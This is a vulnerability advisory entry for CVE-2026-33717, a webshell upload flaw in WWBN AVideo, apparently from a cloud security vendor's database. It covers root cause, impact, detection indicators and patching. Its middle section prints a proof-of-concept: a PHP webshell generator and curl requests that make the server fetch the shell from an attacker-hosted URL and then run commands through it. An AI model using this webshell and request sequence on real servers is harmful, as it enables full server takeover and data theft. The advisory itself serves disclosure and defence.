
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33717 is a Remote Code Execution (RCE) vulnerability in WWBN AVideo, an open source video platform, caused by unrestricted upload of dangerous file types (CWE-434). The downloadVideoFromDownloadURL() function in objects/aVideoEncoder.json.php saves remotely fetched content to a web-accessible temporary directory using the original URL's filename and extension — including .php — without validation. By supplying an invalid resolution parameter, an attacker triggers an early die() via forbiddenPage() before the temp file is moved or cleaned up, leaving an executable PHP webshell persistently accessible at videos/cache/tmpFile/. All versions up to and including 26.0 are affected. The vulnerability was published on March 23, 2026, with a CVSS v3.1 base score of 8.8 (High) (Github Advisory, GHSA Advisory).
The root cause is a logic flaw in the error-handling order of operations within objects/aVideoEncoder.json.php (CWE-434). When a downloadURL parameter is provided, the file is fetched and written to disk at videos/cache/tmpFile/ using basename($downloadURL) as the filename — preserving any extension, including .php — before any resolution validation occurs. The resolution check at line 229 calls forbiddenPage(), which invokes die(), terminating execution before the decideMoveUploadedToVideos() cleanup/move call at line 243 is ever reached. Compounding the issue, the videos/cache/tmpFile/ directory lacks an .htaccess file restricting PHP execution, and the root .htaccess FilesMatch rule only blocks alternate PHP extensions (e.g., .php5, .phtml) but not plain .php. Exploitation requires only low-privilege authenticated access (canUpload permission) and a single HTTP POST request (GHSA Advisory, Patch Commit).
Successful exploitation allows an authenticated attacker with standard upload permissions to achieve full Remote Code Execution on the web server, executing arbitrary commands with the privileges of the web server process. This enables complete server compromise including reading and writing arbitrary files, exfiltrating database credentials and all stored user data, modifying or destroying video content and platform configuration, and using the server as a pivot point for lateral movement to other services on the same network. Notably, the attack leaves minimal traces in application logs beyond the initial download attempt (GHSA Advisory).
A detailed proof-of-concept (PoC) exploit with step-by-step curl commands is publicly available in the GitHub Security Advisory, providing a complete attack sequence that can be executed against a real AVideo deployment (GHSA Advisory). The exploit is rated high confidence by Feedly threat intelligence and requires only low-privilege credentials and an attacker-controlled server hosting a PHP payload of at least 20KB. As of the time of reporting, there is no evidence of active in-the-wild exploitation, no known threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.067% (21st percentile), indicating a currently low but non-negligible probability of exploitation in the near term (Github Advisory).
canUpload permission on the target.python3 -c "
payload = b'<?php system(\$_GET[\"cmd\"]); ?>'
padding = b'\n' + b'/' * (20001 - len(payload))
open('shell.php', 'wb').write(payload + padding)
"Host shell.php at a publicly accessible URL (e.g., https://attacker.example.com/shell.php).
3. Trigger the vulnerable download with invalid resolution: Send a POST request to the target's encoder endpoint, supplying the attacker-hosted PHP file as downloadURL and an invalid resolution value to trigger the early die() before cleanup:
curl -X POST 'https://target.example.com/objects/aVideoEncoder.json.php' \
-d 'user=uploader_username' \
-d 'pass=uploader_password' \
-d 'format=mp4' \
-d 'downloadURL=https://attacker.example.com/shell.php' \
-d 'resolution=9999'Expected response: {"error":true,"msg":"This resolution is not possible 9999","forbiddenPage":true}
4. Access the persisted PHP webshell: The PHP file is now permanently accessible under the web root. Execute arbitrary commands:
curl 'https://target.example.com/videos/cache/tmpFile/shell.php?cmd=id'/objects/aVideoEncoder.json.php with a downloadURL parameter pointing to an external host and a non-standard resolution value (e.g., 9999); subsequent GET requests to /videos/cache/tmpFile/*.php from any client IP..php files in the videos/cache/tmpFile/ directory on the web server; files in this directory with sizes ≥20KB that are not video-related.aVideoEncoder.json.php returning a JSON error response containing "forbiddenPage":true alongside a downloadURL referencing an external server; subsequent GET requests to videos/cache/tmpFile/ paths with .php extensions.bash, sh, curl, wget, python) following requests to videos/cache/tmpFile/*.php.aVideoEncoder.json referencing download attempts from external URLs that do not correspond to legitimate user-initiated video imports (GHSA Advisory).Apply the patch in commit 6da79b43484099a0b660d1544a63c07b633ed3a2, which adds two fixes: (1) resolution validation is moved to occur before any file download begins, and (2) the downloadVideoFromDownloadURL() function now validates the URL's file extension against the server's allowedExtension list before writing to disk (Patch Commit). As interim workarounds, administrators should create a videos/cache/tmpFile/.htaccess file containing Require all denied and php_flag engine off to prevent PHP execution in the temp directory, and audit the directory for any existing .php files that may have been planted. Restricting or monitoring access to objects/aVideoEncoder.json.php at the web server or WAF level for requests containing external downloadURL values is also recommended (GHSA Advisory).
The vulnerability was reported by researcher "offset" and published by DanielnetoDotCom (the AVideo maintainer) on March 23, 2026. Coverage appeared on The Hacker Wire and was noted on Mastodon and Bluesky social platforms shortly after disclosure. No major vendor statements beyond the patch commit and advisory have been issued (GHSA Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."